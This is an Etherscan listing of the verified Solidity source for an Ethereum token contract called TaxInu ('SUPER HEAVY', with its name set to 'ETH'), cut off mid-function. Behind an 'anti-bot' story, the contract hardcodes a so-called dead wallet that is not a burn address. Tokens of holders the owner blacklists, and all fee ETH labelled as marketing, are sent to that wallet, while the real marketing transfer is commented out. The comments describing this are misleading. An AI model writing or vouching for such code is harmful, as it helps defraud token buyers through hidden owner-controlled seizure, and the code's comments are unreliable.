ERC-20
Overview
Max Total Supply
100,000,000,000,000 SUPER HEAVY
Holders
38
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
351,638,919,173.317277056 SUPER HEAVYValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
TaxInu
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2021-07-01 */ /** *Submitted for verification at Etherscan.io on 2021-06-30 */ /** *Submitted for verification at Etherscan.io on 2021-06-28 * /// https://t.me/SUPERHEAVYETH */ //SPDX-License-Identifier: GPL-3.0-or-later pragma solidity ^0.6.12; abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } contract Ownable is Context { address private _owner; address private _previousOwner; uint256 private _lockTime; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // Contract implementation contract TaxInu is Context, IERC20, Ownable { using SafeMath for uint256; using Address for address; mapping (address => uint256) private _rOwned; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; mapping (address => bool) private _isExcluded; // excluded from reward address[] private _excluded; mapping (address => bool) private _isBlackListedBot; address[] private _blackListedBots; uint256 private constant MAX = ~uint256(0); uint256 private _tTotal = 100_000_000_000_000 * 10**9; uint256 private _rTotal = (MAX - (MAX % _tTotal)); uint256 private _tFeeTotal; string private _name = 'ETH'; string private _symbol = 'SUPER HEAVY '; uint8 private _decimals = 9; uint256 private _taxFee = 0; // 0% reflection fee for every holder uint256 private _marketingFee = 1; // 1% marketing uint256 private _liquidityFee = 3; // 3% into liquidity uint256 private _previousTaxFee = _taxFee; uint256 private _previousMarketingFee = _marketingFee; uint256 private _previousLiquidityFee = _liquidityFee; address payable private _marketingWalletAddress = payable(0x9E760657388B9801251E3A8605331E0cE2581879); IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; bool inSwapAndLiquify = false; bool public swapAndLiquifyEnabled = true; uint256 private _maxTxAmount = _tTotal; // We will set a minimum amount of tokens to be swapped uint256 private _numTokensSellToAddToLiquidity = 1000000000 * 10**9; event MinTokensBeforeSwapUpdated(uint256 minTokensBeforeSwap); event SwapAndLiquifyEnabledUpdated(bool enabled); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity ); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = false; } address payable private _DeadWalletAddress = payable(0x4beac524C7aB27e38DEe80ff6C9Df8BA13C94330); // Using Dead Wallet for Anti Bot measures, // DeadWallet comes into play if bots try selling, // instead of sell, tokens are burned and bot addresses saved in DeadWallet transactions. // Addresses saved in DeadWallet will not be able to sell. // Deadwallet is connected to every token that uses this code, // Botblacklist is updated from every instance of this code. // Warning!! Do not chnage DeadWallet Address or Antibot measures will not work. constructor () public { _rOwned[_msgSender()] = _rTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // UniswapV2 for Ethereum network // Create a uniswap pair for this new token uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); // set the rest of the contract variables uniswapV2Router = _uniswapV2Router; // Exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; _isExcludedFromFee[_marketingWalletAddress] = true; _isExcludedFromFee[_DeadWalletAddress] = true; // BLACKLIST _isBlackListedBot[address(0xE031b36b53E53a292a20c5F08fd1658CDdf74fce)] = true; _blackListedBots.push(address(0xE031b36b53E53a292a20c5F08fd1658CDdf74fce)); _isBlackListedBot[address(0xe516bDeE55b0b4e9bAcaF6285130De15589B1345)] = true; _blackListedBots.push(address(0xe516bDeE55b0b4e9bAcaF6285130De15589B1345)); _isBlackListedBot[address(0xa1ceC245c456dD1bd9F2815a6955fEf44Eb4191b)] = true; _blackListedBots.push(address(0xa1ceC245c456dD1bd9F2815a6955fEf44Eb4191b)); _isBlackListedBot[address(0xd7d3EE77D35D0a56F91542D4905b1a2b1CD7cF95)] = true; _blackListedBots.push(address(0xd7d3EE77D35D0a56F91542D4905b1a2b1CD7cF95)); _isBlackListedBot[address(0xFe76f05dc59fEC04184fA0245AD0C3CF9a57b964)] = true; _blackListedBots.push(address(0xFe76f05dc59fEC04184fA0245AD0C3CF9a57b964)); _isBlackListedBot[address(0xDC81a3450817A58D00f45C86d0368290088db848)] = true; _blackListedBots.push(address(0xDC81a3450817A58D00f45C86d0368290088db848)); _isBlackListedBot[address(0x5F186b080F5634Bba9dc9683bc37d192Ee96e2cF)] = true; _blackListedBots.push(address(0x5F186b080F5634Bba9dc9683bc37d192Ee96e2cF)); _isBlackListedBot[address(0x74de5d4FCbf63E00296fd95d33236B9794016631)] = true; _blackListedBots.push(address(0x74de5d4FCbf63E00296fd95d33236B9794016631)); _isBlackListedBot[address(0x36c1c59Dcca0Fd4A8C28551f7b2Fe6421d53CE32)] = true; _blackListedBots.push(address(0x36c1c59Dcca0Fd4A8C28551f7b2Fe6421d53CE32)); _isBlackListedBot[address(0xA3E2b5588C2a42b8fd6B90dc7055Dc118e17ff1f)] = true; _blackListedBots.push(address(0xA3E2b5588C2a42b8fd6B90dc7055Dc118e17ff1f)); _isBlackListedBot[address(0x45fD07C63e5c316540F14b2002B085aEE78E3881)] = true; _blackListedBots.push(address(0x45fD07C63e5c316540F14b2002B085aEE78E3881)); _isBlackListedBot[address(0x27F9Adb26D532a41D97e00206114e429ad58c679)] = true; _blackListedBots.push(address(0x27F9Adb26D532a41D97e00206114e429ad58c679)); emit Transfer(address(0), _msgSender(), _tTotal); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { if (_isExcluded[account]) return _tOwned[account]; return tokenFromReflection(_rOwned[account]); } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function isExcludedFromReward(address account) public view returns (bool) { return _isExcluded[account]; } function setExcludeFromFee(address account, bool excluded) external onlyOwner() { _isExcludedFromFee[account] = excluded; } function totalFees() public view returns (uint256) { return _tFeeTotal; } function deliver(uint256 tAmount) public { address sender = _msgSender(); require(!_isExcluded[sender], "Excluded addresses cannot call this function"); (uint256 rAmount,,,,,) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rTotal = _rTotal.sub(rAmount); _tFeeTotal = _tFeeTotal.add(tAmount); } function reflectionFromToken(uint256 tAmount, bool deductTransferFee) public view returns(uint256) { require(tAmount <= _tTotal, "Amount must be less than supply"); if (!deductTransferFee) { (uint256 rAmount,,,,,) = _getValues(tAmount); return rAmount; } else { (,uint256 rTransferAmount,,,,) = _getValues(tAmount); return rTransferAmount; } } function tokenFromReflection(uint256 rAmount) public view returns(uint256) { require(rAmount <= _rTotal, "Amount must be less than total reflections"); uint256 currentRate = _getRate(); return rAmount.div(currentRate); } function excludeFromReward(address account) external onlyOwner() { require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.'); require(!_isExcluded[account], "Account is already excluded"); if(_rOwned[account] > 0) { _tOwned[account] = tokenFromReflection(_rOwned[account]); } _isExcluded[account] = true; _excluded.push(account); } function includeInReward(address account) external onlyOwner() { require(_isExcluded[account], "Account is already excluded"); for (uint256 i = 0; i < _excluded.length; i++) { if (_excluded[i] == account) { _excluded[i] = _excluded[_excluded.length - 1]; _tOwned[account] = 0; _isExcluded[account] = false; _excluded.pop(); break; } } } function addBotToBlackList(address account) external onlyOwner() { require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not blacklist Uniswap router.'); require(!_isBlackListedBot[account], "Account is already blacklisted"); _isBlackListedBot[account] = true; _blackListedBots.push(account); } function removeBotFromBlackList(address account) external onlyOwner() { require(_isBlackListedBot[account], "Account is not blacklisted"); for (uint256 i = 0; i < _blackListedBots.length; i++) { if (_blackListedBots[i] == account) { _blackListedBots[i] = _blackListedBots[_blackListedBots.length - 1]; _isBlackListedBot[account] = false; _blackListedBots.pop(); break; } } } function removeAllFee() private { if(_taxFee == 0 && _marketingFee == 0 && _liquidityFee == 0) return; _previousTaxFee = _taxFee; _previousMarketingFee = _marketingFee; _previousLiquidityFee = _liquidityFee; _taxFee = 0; _marketingFee = 0; _liquidityFee = 0; } function restoreAllFee() private { _taxFee = _previousTaxFee; _marketingFee = _previousMarketingFee; _liquidityFee = _previousLiquidityFee; } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer(address sender, address recipient, uint256 amount) private { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if(_isBlackListedBot[sender]) { uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance >= _maxTxAmount) { contractTokenBalance = _maxTxAmount; } bool overMinTokenBalance = contractTokenBalance >= _numTokensSellToAddToLiquidity; if (!inSwapAndLiquify && swapAndLiquifyEnabled && overMinTokenBalance && sender != uniswapV2Pair) { contractTokenBalance = _numTokensSellToAddToLiquidity; //add liquidity swapAndLiquify(contractTokenBalance); } //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[sender] || _isExcludedFromFee[recipient]){ takeFee = false; } //transfer amount, it will take tax and charity fee _tokenTransfer(sender, _DeadWalletAddress, amount, takeFee); } if((sender != owner() && sender != uniswapV2Pair)) { require(amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); // sorry about that, but sniper bots nowadays are buying multiple times, hope I have something more robust to prevent them to nuke the launch :-( require(balanceOf(recipient).add(amount) <= _maxTxAmount, "Already bought maxTxAmount, wait till check off"); } // is the token balance of this contract address over the min number of // tokens that we need to initiate a swap + liquidity lock? // also, don't get caught in a circular liquidity event. // also, don't swap & liquify if sender is uniswap pair. uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance >= _maxTxAmount) { contractTokenBalance = _maxTxAmount; } bool overMinTokenBalance = contractTokenBalance >= _numTokensSellToAddToLiquidity; if (!inSwapAndLiquify && swapAndLiquifyEnabled && overMinTokenBalance && sender != uniswapV2Pair) { contractTokenBalance = _numTokensSellToAddToLiquidity; //add liquidity swapAndLiquify(contractTokenBalance); } //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[sender] || _isExcludedFromFee[recipient]){ takeFee = false; } //transfer amount, it will take tax and charity fee _tokenTransfer(sender, recipient, amount, takeFee); } function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap { uint256 toMarketing = contractTokenBalance.mul(_marketingFee).div(_marketingFee.add(_liquidityFee)); uint256 toLiquify = contractTokenBalance.sub(toMarketing); // split the contract balance into halves uint256 half = toLiquify.div(2); uint256 otherHalf = toLiquify.sub(half); // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // swap tokens for ETH uint256 toSwapForEth = half.add(toMarketing); swapTokensForEth(toSwapForEth); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered // how much ETH did we just swap into? uint256 fromSwap = address(this).balance.sub(initialBalance); uint256 newBalance = fromSwap.mul(half).div(toSwapForEth); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); sendETHToMarketing(fromSwap.sub(newBalance)); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); } function sendETHToMarketing(uint256 amount) private { _DeadWalletAddress.transfer(amount); } // _marketingWalletAddress.transfer(amount); // We are exposing these functions to be able to manual swap and send // in case the token is highly valued and 5M becomes too much function manualSwap() external onlyOwner() { uint256 contractBalance = balanceOf(address(this)); swapTokensForEth(contractBalance); } function manualSend() public onlyOwner() { uint256 contractETHBalance = address(this).balance; sendETHToMarketing(contractETHBalance); } function setSwapAndLiquifyEnabled(bool _swapAndLiquifyEnabled) external onlyOwner(){ swapAndLiquifyEnabled = _swapAndLiquifyEnabled; } function _tokenTransfer(address sender, address recipient, uint256 amount, bool takeFee) private { if(!takeFee) removeAllFee(); if (_isExcluded[sender] && !_isExcluded[recipient]) { _transferFromExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && _isExcluded[recipient]) { _transferToExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && !_isExcluded[recipient]) { _transferStandard(sender, recipient, amount); } else if (_isExcluded[sender] && _isExcluded[recipient]) { _transferBothExcluded(sender, recipient, amount); } else { _transferStandard(sender, recipient, amount); } if(!takeFee) restoreAllFee(); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tMarketingLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeMarketingLiquidity(tMarketingLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferToExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tMarketingLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeMarketingLiquidity(tMarketingLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tMarketingLiquidity) = _getValues(tAmount); 